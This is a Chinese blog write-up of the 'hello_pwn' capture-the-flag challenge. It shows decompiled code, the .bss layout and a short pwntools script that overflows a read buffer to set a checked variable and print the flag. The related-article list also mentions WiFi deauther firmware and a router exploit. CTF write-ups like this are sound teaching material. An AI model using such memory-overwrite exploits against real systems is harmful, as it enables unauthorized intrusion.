攻防世界-wp-PWN-新手区-5-hello_pwn

最新推荐文章于 2024-04-09 22:31:38 发布
最新推荐文章于 2024-04-09 22:31:38 发布
阅读量2.7k 收藏 1
点赞数 3
分类专栏: pwn 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45161658/article/details/113997228
版权

题目来源:

NUAACTF

题目描述:

pwn!,segment fault!菜鸡陷入了深思

题目场景:

111.200.241.244:34217

题目附件:

4f2f44c9471d4dc2b59768779e378282

题目思路:

直接栈溢出,使得dword_60106C位置等于1853186401即可运行后面函数得到flag

解题过程:

拿到程序后,我们首先checksec一下
在这里插入图片描述
发现是64位程序,只开了NX(堆栈不可执行),跑一下程序看看
img
可以看到它是一个输入,放到IDA64里面查看

int64 __fastcall main(__int64 a1, char **a2, char **a3){
  alarm(0x3Cu);
  setbuf(stdout, 0LL);
  puts("~~ welcome to ctf ~~     ");
  puts("lets get helloworld for bof");
  read(0, &unk_601068, 0x10uLL);
  if ( dword_60106C == 1853186401 )
    sub_400686();
  return 0LL;
}

dword_60106C的值为1853186401时,程序会进入一个函数中,而这个函数的作用就是显示flag,接下来就是去改变这个变量的值。

.bss:0000000000601068 unk_601068      db    ? ;               ; DATA XREF: main+3B↑o
.bss:0000000000601069                 db    ? ;
.bss:000000000060106A                 db    ? ;
.bss:000000000060106B                 db    ? ;
.bss:000000000060106C dword_60106C    dd ?                    ; DATA XREF: main+4A↑r

双击查看unk_601068dword_60106C的位置,可以知道这两个变量都在.bss段,并且dword_60106C就在离unk_601068四个位置的地方,而且unk_601068是由我们输入的,而且给了10个长度,可以借此覆盖掉dword_60106C,去掉中文使用exp:

from pwn import *
r=remote('220.249.52.134',40334)#远程连接
payload='A'*4+p64(1853186401)#4个字符覆盖68
r.recvuntil("d for bof\n")#接收到字符后
r.sendline(payload)#发送payload
print(r.recv())

cyberpeace{a8c51e75d4edd892c05980ec5e30363b}

Scorpio-m7
关注
  • 3
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
攻防世界PWN-hello_pwn
Deeeelete的博客
11-14 394
题目:hello_pwn 进pe查看程序 因为该题目比较简单,所以确认是64位程序,直接进IDA f5反编译main函数 单独摘出代码 __int64 __fastcall main(__int64 a1, char **a2, char **a3) { alarm(0x3Cu); setbuf(stdout, 0LL); puts("~~ welcome to ctf ~~ "); puts("lets get helloworld for bof"); re
hello_pwn--writeup
ATFWUS的博客
03-01 578
文件下载地址: 链接:https://pan.baidu.com/s/1Qp1fxOU8b4VobwSIouK7OQ 提取码:g47i 0x01.分析 checksec: 64位程序,开启NX。 源码: 流程很简单,只要保证106c这个变量的值等于后面这个数字就可以了,前面有read函数,明显的栈溢出,只要想办法修改下面这个变量的值就行了。 发现这两个变量的差...
pwn学习(1)攻防世界-hello_pwn(大小端存储/ELF文件)
m0_66039322的博客
08-25 286
最后结果: cyberpeace{f178d34680e278da75e4b40e9921da97}查看读入数据和比较数据的位置,会发现问题,他们是挨着的,且相差4个字节,0000000000601068是开始位置,中间的数据随便填充即可。
攻防世界-PWN-hello_pwn
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
09-24 491
开始进军PWN题 目录 分析 拖入IDA exp 分析 使用 file 和 checksec(查看程序的保护机制) 指令分析文件 x86-64 架构 Linux可执行文件ELF checksec参数 Arch 程序架构信息。这里是amd64-64的 RELRO 主要针对 GOT 改写的攻击方式的保护 RELRO为” Partial RELRO”,说明我们对GOT表具有写权限。 这里也没作保护 Stack 栈保护 这里没有启用 NX 栈没有执行权限 这里是打开的 PI.
攻防世界hello pwn WPpwn入门基础题)
m0_62584974的博客
11-21 2046
攻防世界hello pwn WPpwn入门基础题)的简单讲解
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
PWM-OUT.rar_PWN_out
09-19
"PWM-OUT.rar_PWN_out"这个压缩包文件,显然是关于如何在某种微控制器上设置和使用PWM输出的教程或代码示例。 在微控制器中,PWM的生成主要涉及到以下几个关键知识点: 1. **PWM通道**:微控制器通常有多个PWM通道...
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
攻防世界hello_pwn
最新发布
2301_80216972的博客
04-09 297
pe分析知道是elf文件(elf文件是Linux下的可执行文件,可以在Linux直接运行)ida分析:下载后ida打开找到main函数,F5反编译。
攻防世界-hello_pwn
qq_52333044的博客
06-22 247
第一种:通过先输入四给任意字符再输入"aaun" (为什么是aaun呢,因为小端序和大端序的问题,小端序低地址存低位,大端序就是低地址存高位,这里采用小端序)unk-601068和dword——60106C相差4 个字节,然后我们可以通过覆盖来改变dwod_60106c的赋值。发现当unk_601068等于nuaa时才能得到flag。习惯性的用ls没有什么用,然后查看是多少位。然后用64位IDA打开查看程序。用kali linux 打开。第二种:就直接写exp。
[攻防世界]hello_pwn
逆向萌新的博客
06-20 287
[攻防世界]hello_pwn
攻防世界hello _pwn总结
RMC131的博客
11-13 4557
checksec 转自:checksec工具使用-pwn – 简书 (jianshu.com) 基本用法:checksec –file=hello_pwn Arch: 系统架构信息,判断是64位还是32位,选择相应的IDA和写相应的exp。 amd64-64-little说明为64位,选用64位的IDA,写64位的exp。 RELRO: Relocation Read-Only (RELRO),此项技术针对GOT/GIFTO(块链)改写的攻击方式。分为两种,Partial RELRO 和 Full RE
pwn 攻防世界刷题记录
m0_75234353的博客
05-19 175
运行就能getshell直接nc。
[CTF-PWN]攻防世界新手村-hello_pwn[wp]
murongxuege的博客
10-01 2559
事件起因(无语) 手残博主因在27日从根地址误删了自己两年半配置和使用的kali虚拟机。。。在一步步恢复环境配置的时候,从头到尾刷一遍题,总结思路。 题目分析 开启场景后,服务端会开启对应的端口,并在端口上部署和附件相同的ELF二进制可执行文件,我们要做的就是下载附件并在本地进行反汇编,反编译等操作分析程序漏洞,从而利用漏洞获取题目的flag。 从描述中可以看出当前程序是要进行年龄的输入操作的,有输入操作,还是在新手村,那么大概率是gets()等C函数输入漏洞,进一步猜测是普通的内存地址覆盖的题。 che
攻防世界pwn刷题--hello_pwn
m0_74073577的博客
09-29 159
0x60106c-0x611068=4个字节,那么输入4个a就可以到达目标地址(python里b’a‘的长度是一个字节),再输入‘nuaa‘即可,需要注意的是checksec后是小端序,绝大部分题目都是小端序,所以数据高位应该在地址低位,即输入’aaun‘,总体的payload应该是aaaa+aaun,如果暂时无法理解这个亦可以使用pwntools工具,使用p64打包数据即可,这样的话payload应该是payload=b’a‘*4+p64(0x6E756161),这个0x6E。结果是‘nuaa’。
攻防世界pwn第二题-hello pwn(两种方法)
Greic的博客
11-28 1947
嘿嘿,我又回来了。看到上次自己发的博客,感觉图片的排版好差劲 这次我将!搞好一点(hhh),话不多说,开始。 至于前面的检查保护类型和看文件类型就不说了,有兴趣的小伙伴们可以看看pwn的第一题。有一说一,其实这道题已经有很大大佬发过write-up了,大佬们也写的很好,我在做题的过程中,也看过一些大佬们的write-up,但嘛,写一写,总是比没有好叭。 在检查完文件类型和保护机制后,我们很容易发现,就是一个很普通的64位的Linux件,且并没有什么保护类型。这个时候,我们先运行看看...
初学pwn-攻防世界(hello_pwn)
天柱的博客
08-26 3442
初学pwn-writeUp 攻防世界的第二道题目,hello_pwn。 首先创建场景,使用nc进入远端,发现他只输出了一串字符串,没有别的内容,也无法使用ls查看它的文件。 下载场景提供的文件,使用cat查看,发现是ELF文件,按照大佬的流程,ELF文件直接用ida打开。 初次使用ida,深切的感受到了ida的强大。 打开之后,按F5,进行反编译,可以看到main函数的伪代码 可以从main函数中看到,这里存在一个判断,如果条件达成的话,会调用一个函数。点开函数看一下。 可以发现里边会输出flag.tx
攻防世界pwn-forgot
08-10
- *1* [攻防世界pwn题:forgot](https://blog.csdn.net/m0_62396648/article/details/125134327)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Scorpio-m7

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值